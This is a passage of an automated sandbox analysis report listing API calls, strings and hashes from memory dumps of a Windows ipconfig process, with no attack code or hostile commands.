                                                                                                                              • Instruction Fuzzy Hash: 5A011671E1420EABDF00EFA1CD85AFEB7B8FB05304F50056AE521E2140D7B4EA04EB60
                                                                                                                              APIs
                                                                                                                              • GetSystemTimeAsFileTime.API-MS-WIN-CORE-SYSINFO-L1-1-0 ref: 00F626B7
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4000176880.0000000000F60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                                                                                              • Associated: 00000009.00000002.4000176880.0000000000F67000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_f60000_ipconfig.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Time$FileSystem
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2086374402-0
                                                                                                                              • Opcode ID: 9e7548a35c72ce62c75a8651a5764dd3d0488007771cf0cfa3a8f523bc15449a
                                                                                                                              • Instruction ID: 7b2fb75caeb9d278830e90df1523a12079c5645232a61b6113d66de8e99003f5
                                                                                                                              • Opcode Fuzzy Hash: 9e7548a35c72ce62c75a8651a5764dd3d0488007771cf0cfa3a8f523bc15449a
                                                                                                                              • Instruction Fuzzy Hash: 67D0A73300822ABBCB503F95DC04C86BBA9EF96331710C327F5B451062DEB19C5097A0
                                                                                                                              APIs
                                                                                                                              • SetUnhandledExceptionFilter.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(Function_000053A0), ref: 00F653F5
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4000176880.0000000000F60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                                                                                              • Associated: 00000009.00000002.4000176880.0000000000F67000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_f60000_ipconfig.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ExceptionFilterUnhandled
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3192549508-0
                                                                                                                              • Opcode ID: 99c8bf8047e30fe07484a33c9b82c5a5100b8f8cec3a1f8643e6263f95370733
                                                                                                                              • Instruction ID: b1d70ae809c8a2d466a8cc1f23535ad14f3cc959d74a44579185d7d3270c65cf
                                                                                                                              • Opcode Fuzzy Hash: 99c8bf8047e30fe07484a33c9b82c5a5100b8f8cec3a1f8643e6263f95370733
                                                                                                                              • Instruction Fuzzy Hash: F2900270255604E686002BB06D4A40676955B4CE46BD14550E021D4154DBE190007532
                                                                                                                              APIs
                                                                                                                              • HeapSetInformation.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000001,00000000,00000000), ref: 00F6470F
                                                                                                                              • setlocale.MSVCRT ref: 00F6471B
                                                                                                                              • SetThreadUILanguage.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000), ref: 00F64724
                                                                                                                                • Part of subcall function 00F65769: __iob_func.MSVCRT ref: 00F6576E
                                                                                                                                • Part of subcall function 00F64C73: fgetpos.MSVCRT ref: 00F64CA8
                                                                                                                                • Part of subcall function 00F64C73: _fileno.MSVCRT ref: 00F64CC2
                                                                                                                                • Part of subcall function 00F64C73: _setmode.MSVCRT ref: 00F64CCA
                                                                                                                                • Part of subcall function 00F64C73: fwprintf.MSVCRT ref: 00F64CD6
                                                                                                                              • exit.MSVCRT ref: 00F647E5
                                                                                                                              • FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00001100,00000000,000002E4,00000000,?,00000000,00000000), ref: 00F64807
                                                                                                                              • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00F64827
                                                                                                                                • Part of subcall function 00F631D0: DnsResolverOp.DNSAPI(00000002,00000000,00000000), ref: 00F631D9
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4000176880.0000000000F60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                                                                                              • Associated: 00000009.00000002.4000176880.0000000000F67000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_f60000_ipconfig.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: FormatFreeHeapInformationLanguageLocalMessageResolverThread__iob_func_fileno_setmodeexitfgetposfwprintfsetlocale
                                                                                                                              • String ID: all$allcompartments$debug$displaydns$flushdns$registerdns$release$release6$renew$renew6$setclassid$setclassid6$showclassid$showclassid6
                                                                                                                              • API String ID: 1456437472-1517225019
                                                                                                                              • Opcode ID: 58129bc72d749a5675c8c7ba11868c5b215fcc9dc95c72453760bef81a532212
                                                                                                                              • Instruction ID: 38ebd4b488f0572513148333357f824b765419f4dff79e876b43c2ab830ae85d
                                                                                                                              • Opcode Fuzzy Hash: 58129bc72d749a5675c8c7ba11868c5b215fcc9dc95c72453760bef81a532212
                                                                                                                              • Instruction Fuzzy Hash: A181AA76948341AB8721FF20D88692FB7E4BFC1764F284A1EF49257242DB74AC44FB52
                                                                                                                              APIs
                                                                                                                              • fflush.MSVCRT ref: 00F64D51
                                                                                                                                • Part of subcall function 00F64B41: _fileno.MSVCRT ref: 00F64B4C
                                                                                                                                • Part of subcall function 00F64B41: _get_osfhandle.MSVCRT ref: 00F64B53
                                                                                                                              • _fileno.MSVCRT ref: 00F64D71
                                                                                                                              • _setmode.MSVCRT ref: 00F64D79
                                                                                                                              • wcschr.MSVCRT ref: 00F64D9C
                                                                                                                              • _fileno.MSVCRT ref: 00F64DC2
                                                                                                                              • _setmode.MSVCRT ref: 00F64DCA
                                                                                                                              • WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(?,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 00F64DE8
                                                                                                                              • LocalAlloc.API-MS-WIN-CORE-HEAP-L2-1-0(00000040,00000000), ref: 00F64DF8
                                                                                                                              • WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(?,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 00F64E16
                                                                                                                              • _fileno.MSVCRT ref: 00F64E23
                                                                                                                              • _write.MSVCRT ref: 00F64E2B
                                                                                                                              • fwprintf.MSVCRT ref: 00F64E3C
                                                                                                                              • fflush.MSVCRT ref: 00F64E46
                                                                                                                              • _fileno.MSVCRT ref: 00F64E4F
                                                                                                                              • _setmode.MSVCRT ref: 00F64E57
                                                                                                                              • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(00000000), ref: 00F64E64
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4000176880.0000000000F60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                                                                                              • Associated: 00000009.00000002.4000176880.0000000000F67000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_f60000_ipconfig.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: _fileno$_setmode$ByteCharLocalMultiWidefflush$AllocFree_get_osfhandle_writefwprintfwcschr
                                                                                                                              • String ID: %ls
                                                                                                                              • API String ID: 2233937912-3246610740
                                                                                                                              • Opcode ID: f5386fe49d1b423b8aca122e4cce8259c2f1aac33d11714348551bea3619fde5
                                                                                                                              • Instruction ID: f55ccf8abc4c9b4a9ccdadc5d8da66c0e3c39f924aaf6541114453e2a2622f13
                                                                                                                              • Opcode Fuzzy Hash: f5386fe49d1b423b8aca122e4cce8259c2f1aac33d11714348551bea3619fde5
                                                                                                                              • Instruction Fuzzy Hash: AF319332908219FFEB027BA4EC09FAE7B78EF46329F204156F521E11D1DFB55901AB24
                                                                                                                              APIs
                                                                                                                              • memset.MSVCRT ref: 00F62340
                                                                                                                              • ConvertInterfaceLuidToGuid.IPHLPAPI(?,?), ref: 00F623D3
                                                                                                                              • RtlStringFromGUID.NTDLL(?,?), ref: 00F623EC
                                                                                                                              • memcpy.MSVCRT(?,?,00000001), ref: 00F6241A
                                                                                                                              • RtlFreeUnicodeString.NTDLL(?), ref: 00F6243B
                                                                                                                                • Part of subcall function 00F62260: memset.MSVCRT ref: 00F6228A
                                                                                                                                • Part of subcall function 00F62260: RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(80000002,?,00000000,?,00F62207,?,00000000,SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\,00000200), ref: 00F622DF
                                                                                                                              • RegSetValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,DhcpClassId,00000000,00000001,?,00000000,00000002,?), ref: 00F62491
                                                                                                                              • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?), ref: 00F6249D
                                                                                                                              • memset.MSVCRT ref: 00F624AD
                                                                                                                              • DhcpHandlePnPEvent.DHCPCSVC(00000000,00000001,?,?,00000000), ref: 00F624C9
                                                                                                                                • Part of subcall function 00F65769: __iob_func.MSVCRT ref: 00F6576E
                                                                                                                                • Part of subcall function 00F64E6F: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000900,?,00000000,?,00000000,?,00000001,00000001,?,00F61EB0,00000000,00002908), ref: 00F64E96
                                                                                                                                • Part of subcall function 00F64E6F: LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,00F61EB0,00000000,00002908), ref: 00F64EAE
                                                                                                                              • RtlFreeUnicodeString.NTDLL(?), ref: 00F62524
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4000176880.0000000000F60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                                                                                              • Associated: 00000009.00000002.4000176880.0000000000F67000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_f60000_ipconfig.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: FreeStringmemset$Unicode$CloseConvertDhcpEventFormatFromGuidHandleInterfaceLocalLuidMessageOpenValue__iob_funcmemcpy
                                                                                                                              • String ID: DhcpClassId$p<Cw
                                                                                                                              • API String ID: 4056406669-1008761339
                                                                                                                              • Opcode ID: 07c9b34ff364817416647e2a4575b45429812506734e041cbd7d8b3c6f19ba1b
                                                                                                                              • Instruction ID: 7406def7cf6a753e49c9ada3b65d8a7e7a0a44341133c4bd05fc38e8a99bbec7
                                                                                                                              • Opcode Fuzzy Hash: 07c9b34ff364817416647e2a4575b45429812506734e041cbd7d8b3c6f19ba1b
                                                                                                                              • Instruction Fuzzy Hash: F561F572E00708AFDB20EB64CC55FAFB3B9EF89710F0440A9E54AE7241DA749E41AF11
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4001015538.0000000003830000.00000040.00001000.00020000.00000000.sdmp, Offset: 03830000, based on PE: true
                                                                                                                               • Associated: 00000009.00000002.4001015538.0000000003959000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                               • Associated: 00000009.00000002.4001015538.000000000395D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                               • Associated: 00000009.00000002.4001015538.00000000039CE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_3830000_ipconfig.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ___swprintf_l
                                                                                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                              • API String ID: 48624451-2108815105
                                                                                                                              • Opcode ID: 420b4e6ae55c78b124c356196a730f2f17b147d441e85ca9ecd500b69205fe08
                                                                                                                              • Instruction ID: d648d78daf5132eb9e9bd6d2ed043bf7f62b3bd3a506fcf01e80e19d2c194bb5
                                                                                                                              • Opcode Fuzzy Hash: 420b4e6ae55c78b124c356196a730f2f17b147d441e85ca9ecd500b69205fe08
                                                                                                                              • Instruction Fuzzy Hash: 6751FAB6A0451ABFDB24DBDC899097EF7B8BB0860071885E9E4A5D7741D374DE00C7E0
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4001015538.0000000003830000.00000040.00001000.00020000.00000000.sdmp, Offset: 03830000, based on PE: true
                                                                                                                               • Associated: 00000009.00000002.4001015538.0000000003959000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                               • Associated: 00000009.00000002.4001015538.000000000395D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                               • Associated: 00000009.00000002.4001015538.00000000039CE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_3830000_ipconfig.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ___swprintf_l
                                                                                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                              • API String ID: 48624451-2108815105
                                                                                                                              • Opcode ID: d1b21777c9f347bec949a32b625fdd915b413bd6b9897fbb1ac98392bdd73f7e
                                                                                                                              • Instruction ID: 09fc8ec0e4710aa852c7e940cb56ed210cc12d5e79b5ec13dfabff9b401140cb
                                                                                                                              • Opcode Fuzzy Hash: d1b21777c9f347bec949a32b625fdd915b413bd6b9897fbb1ac98392bdd73f7e
                                                                                                                              • Instruction Fuzzy Hash: 36512AB5A006496ECB30EF9CC99097FB7FDDB44240B448CA9E4D6E7685E7B4DA108760
                                                                                                                              APIs
                                                                                                                              • ConvertInterfaceLuidToGuid.IPHLPAPI(?,?), ref: 00F62D48
                                                                                                                              • RtlStringFromGUID.NTDLL(?,?), ref: 00F62D5E
                                                                                                                              • memcpy.MSVCRT(?,?,00000050), ref: 00F62D83
                                                                                                                              • RtlFreeUnicodeString.NTDLL(?), ref: 00F62DA2
                                                                                                                                • Part of subcall function 00F62C01: memset.MSVCRT ref: 00F62C2B
                                                                                                                                • Part of subcall function 00F62C01: RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(80000002,?,00000000,?,00F62BA8,?,00000000,SYSTEM\CurrentControlSet\Services\Tcpip6\Parameters\Interfaces\,00000200), ref: 00F62C80
                                                                                                                              • RegSetValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,Dhcpv6ClassId,00000000,00000001,?,00000000,00000002,?), ref: 00F62DED
                                                                                                                              • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?), ref: 00F62DF6
                                                                                                                              • Dhcpv6SetUserClass.DHCPCSVC6(?,?,?), ref: 00F62E16
                                                                                                                                • Part of subcall function 00F65769: __iob_func.MSVCRT ref: 00F6576E
                                                                                                                                • Part of subcall function 00F64E6F: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000900,?,00000000,?,00000000,?,00000001,00000001,?,00F61EB0,00000000,00002908), ref: 00F64E96
                                                                                                                                • Part of subcall function 00F64E6F: LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,00F61EB0,00000000,00002908), ref: 00F64EAE
                                                                                                                              • RtlFreeUnicodeString.NTDLL(?), ref: 00F62E6F
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4000176880.0000000000F60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                                                                                               • Associated: 00000009.00000002.4000176880.0000000000F67000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_f60000_ipconfig.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: FreeString$Unicode$ClassCloseConvertDhcpv6FormatFromGuidInterfaceLocalLuidMessageOpenUserValue__iob_funcmemcpymemset
                                                                                                                              • String ID: Dhcpv6ClassId$p<Cw
                                                                                                                              • API String ID: 3741014365-218402466
                                                                                                                              • Opcode ID: 7f12cc99544351b82162eb6233bf03211d9acf2ba75c1facd59bb8fc291667e7
                                                                                                                              • Instruction ID: 0f3541ea655a7fb64ca347bd7832ca647f0816af1d4a8a2af54f981a0e99bbe4
                                                                                                                              • Opcode Fuzzy Hash: 7f12cc99544351b82162eb6233bf03211d9acf2ba75c1facd59bb8fc291667e7
                                                                                                                              • Instruction Fuzzy Hash: 83512932E00A089BDF249FA8DC45BAF77B9FF94714F24413EE906E7291DB719801AB50
                                                                                                                              APIs
                                                                                                                              • GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(OutputEncoding,?,00000050,?), ref: 00F64BE2
                                                                                                                              • _wcsicmp.MSVCRT ref: 00F64C03
                                                                                                                              • _wcsicmp.MSVCRT ref: 00F64C1E
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4000176880.0000000000F60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                                                                                               • Associated: 00000009.00000002.4000176880.0000000000F67000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_f60000_ipconfig.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: _wcsicmp$EnvironmentVariable
                                                                                                                              • String ID: Ansi$OutputEncoding$UTF-8$UTF8$Unicode
                                                                                                                              • API String ID: 198002717-1479523454
                                                                                                                              • Opcode ID: f2415db93f640728c08788676c1ec0ef1a78761ad2e4375d5283e8691ba1eae5
                                                                                                                              • Instruction ID: 5a8f683b76c62f8c42e35d99e292911e1f24bfa71a81efa7ab64046ec2fabbdf
                                                                                                                              • Opcode Fuzzy Hash: f2415db93f640728c08788676c1ec0ef1a78761ad2e4375d5283e8691ba1eae5
                                                                                                                              • Instruction Fuzzy Hash: 0B110A35A0530AAFDF24BB20DC15BA677E8EF45324F24045AF541D2280EBB0E900BA15
                                                                                                                              APIs
                                                                                                                              • GetComputerNameExW.API-MS-WIN-CORE-SYSINFO-L1-1-0(00000001,?,?), ref: 00F641CF
                                                                                                                              • GetComputerNameExW.API-MS-WIN-CORE-SYSINFO-L1-1-0(00000002,?,?), ref: 00F64212
                                                                                                                              • GetNetworkParams.IPHLPAPI(00000000,?), ref: 00F64249
                                                                                                                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?), ref: 00F64260
                                                                                                                              • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 00F64267
                                                                                                                              • GetNetworkParams.IPHLPAPI(00000000,?), ref: 00F6427F
                                                                                                                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000), ref: 00F642FE
                                                                                                                              • HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 00F64305
                                                                                                                              • DnsQueryConfigAllocEx.DNSAPI(00010003,00000000,00000000), ref: 00F64312
                                                                                                                              • MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0(0000FDE9,00000000,?,000000FF,?,000000FF), ref: 00F6433D
                                                                                                                              • DnsFreeConfigStructure.DNSAPI(00000000,00010003), ref: 00F64381
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4000176880.0000000000F60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                                                                                               • Associated: 00000009.00000002.4000176880.0000000000F67000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_f60000_ipconfig.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Heap$AllocComputerConfigFreeNameNetworkParamsProcess$ByteCharMultiQueryStructureWide
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3728844974-0
                                                                                                                              • Opcode ID: 74c64a1f17d9bae396dc119fadfc6eb3af8969d5796469648463db8d8e671069
                                                                                                                              • Instruction ID: 524749ed5d84f7b4bacdd16b2208f9b8b95efbb9e71d19697f2b262416746462
                                                                                                                              • Opcode Fuzzy Hash: 74c64a1f17d9bae396dc119fadfc6eb3af8969d5796469648463db8d8e671069
                                                                                                                              • Instruction Fuzzy Hash: A451B472904319BFE7217B60DD8EEAB736CEB54714F100069F525E6192DB74AD80BB20
                                                                                                                              Strings
                                                                                                                              • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 038D4725
                                                                                                                              • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 038D4742
                                                                                                                              • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 038D46FC
                                                                                                                              • ExecuteOptions, xrefs: 038D46A0
                                                                                                                              • CLIENT(ntdll): Processing section info %ws..., xrefs: 038D4787
                                                                                                                              • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 038D4655
                                                                                                                              • Execute=1, xrefs: 038D4713
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4001015538.0000000003830000.00000040.00001000.00020000.00000000.sdmp, Offset: 03830000, based on PE: true
                                                                                                                               • Associated: 00000009.00000002.4001015538.0000000003959000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                               • Associated: 00000009.00000002.4001015538.000000000395D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                               • Associated: 00000009.00000002.4001015538.00000000039CE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_3830000_ipconfig.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                              • API String ID: 0-484625025
                                                                                                                              • Opcode ID: 01ab66292536817694293ffb65f3df67fccdd4e5b0e583fec1ac046e18b6ff6c
                                                                                                                              • Instruction ID: c20ef690cde59010d4adec1b7e893b3d4e9b0a6a817c02c68533067d4c37aae3
                                                                                                                              • Opcode Fuzzy Hash: 01ab66292536817694293ffb65f3df67fccdd4e5b0e583fec1ac046e18b6ff6c
                                                                                                                              • Instruction Fuzzy Hash: 9351E83561031D7AFF11EAE9DC89BAD77A8AB45304F0C00DAE605EB181EB709A45CB51
                                                                                                                              APIs
                                                                                                                              • ConvertInterfaceLuidToNameW.IPHLPAPI(?,?,00000020), ref: 00F629FD
                                                                                                                              • LocalAlloc.API-MS-WIN-CORE-HEAP-L2-1-0(00000000,00000400), ref: 00F62A16
                                                                                                                              • Dhcpv6GetUserClasses.DHCPCSVC6(00000000,?,?,00000000), ref: 00F62A38
                                                                                                                              • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(00000000), ref: 00F62A49
                                                                                                                              • LocalAlloc.API-MS-WIN-CORE-HEAP-L2-1-0(00000000,?), ref: 00F62A54
                                                                                                                              • Dhcpv6GetUserClasses.DHCPCSVC6(00000000,?,?,00000000), ref: 00F62A6E
                                                                                                                              • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(00000000), ref: 00F62AEA
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4000176880.0000000000F60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                                                                                               • Associated: 00000009.00000002.4000176880.0000000000F67000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_f60000_ipconfig.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Local$AllocClassesDhcpv6FreeUser$ConvertInterfaceLuidName
                                                                                                                              • String ID: pFl
                                                                                                                              • API String ID: 1150267431-941757518
                                                                                                                              • Opcode ID: 9da37894dbdf710876869637d2da05b8933d16cf021465eb26acdc0a58c33c1d
                                                                                                                              • Instruction ID: 513a9dc254aff1c98d955e5a0859d39d0d4adc5df85b7027e0ff03e7f7702d7b
                                                                                                                              • Opcode Fuzzy Hash: 9da37894dbdf710876869637d2da05b8933d16cf021465eb26acdc0a58c33c1d
                                                                                                                              • Instruction Fuzzy Hash: 2C418472E00709AFDB11AFE4DD85BAEB778FF54710F140125F905AB281DBB4AC41ABA0
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 00F64B41: _fileno.MSVCRT ref: 00F64B4C
                                                                                                                                • Part of subcall function 00F64B41: _get_osfhandle.MSVCRT ref: 00F64B53
                                                                                                                                • Part of subcall function 00F64BBC: GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(OutputEncoding,?,00000050,?), ref: 00F64BE2
                                                                                                                                • Part of subcall function 00F64BBC: _wcsicmp.MSVCRT ref: 00F64C03
                                                                                                                              • fgetpos.MSVCRT ref: 00F64CA8
                                                                                                                              • _fileno.MSVCRT ref: 00F64CC2
                                                                                                                              • _setmode.MSVCRT ref: 00F64CCA
                                                                                                                              • fwprintf.MSVCRT ref: 00F64CD6
                                                                                                                              • fgetpos.MSVCRT ref: 00F64CEF
                                                                                                                              • _fileno.MSVCRT ref: 00F64D09
                                                                                                                              • _setmode.MSVCRT ref: 00F64D11
                                                                                                                              • _fileno.MSVCRT ref: 00F64D21
                                                                                                                              • _write.MSVCRT ref: 00F64D29
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4000176880.0000000000F60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                                                                                               • Associated: 00000009.00000002.4000176880.0000000000F67000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_f60000_ipconfig.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: _fileno$_setmodefgetpos$EnvironmentVariable_get_osfhandle_wcsicmp_writefwprintf
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2328354365-0
                                                                                                                              • Opcode ID: 4c21ba27850122aba881083c22fc1ac9d584c658ab012881922903b2d143d8a7
                                                                                                                              • Instruction ID: 1d30b3aec9102dcece8a9b1ebc9ec5d0de89eff1db00219c14036a681836f04c
                                                                                                                              • Opcode Fuzzy Hash: 4c21ba27850122aba881083c22fc1ac9d584c658ab012881922903b2d143d8a7
                                                                                                                              • Instruction Fuzzy Hash: A2113331D45208EFEB15BB64EC0AADDB7B8FF0232CB544456F651D2081EBB4BA01AA95
                                                                                                                              APIs
                                                                                                                              • Sleep.API-MS-WIN-CORE-SYNCH-L1-2-0(000003E8,00F657D0,0000000C), ref: 00F64FA0
                                                                                                                              • _amsg_exit.MSVCRT ref: 00F64FB5
                                                                                                                              • _initterm.MSVCRT ref: 00F65009
                                                                                                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 00F65035
                                                                                                                              • exit.MSVCRT ref: 00F6507C
                                                                                                                              • _XcptFilter.MSVCRT ref: 00F6508E
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4000176880.0000000000F60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                                                                                               • Associated: 00000009.00000002.4000176880.0000000000F67000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_f60000_ipconfig.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CurrentFilterImageNonwritableSleepXcpt_amsg_exit_inittermexit
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 796493780-0
                                                                                                                              • Opcode ID: fe6e09a888b812c313cbef13afc47481c5fc6f6cdffb93018d6892de65368210
                                                                                                                              • Instruction ID: 4a3fd9fb47beaf242fce8f40e6f3cdcab72523b3d7670b0243a59fb79105a5bb
                                                                                                                              • Opcode Fuzzy Hash: fe6e09a888b812c313cbef13afc47481c5fc6f6cdffb93018d6892de65368210
                                                                                                                              • Instruction Fuzzy Hash: 0831B07190471AEFDB21AF54ED067197BA4FB08B34F10012DE522E77E1DBB19840FA91
                                                                                                                              APIs
                                                                                                                              • _fileno.MSVCRT ref: 00F64B4C
                                                                                                                              • _get_osfhandle.MSVCRT ref: 00F64B53
                                                                                                                              • GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,0000054F,00000000,00002908), ref: 00F64B69
                                                                                                                              • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00F64B75
                                                                                                                              • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00F64B7F
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4000176880.0000000000F60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                                                                                               • Associated: 00000009.00000002.4000176880.0000000000F67000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_f60000_ipconfig.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ErrorLast$FileType_fileno_get_osfhandle
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3475475711-0
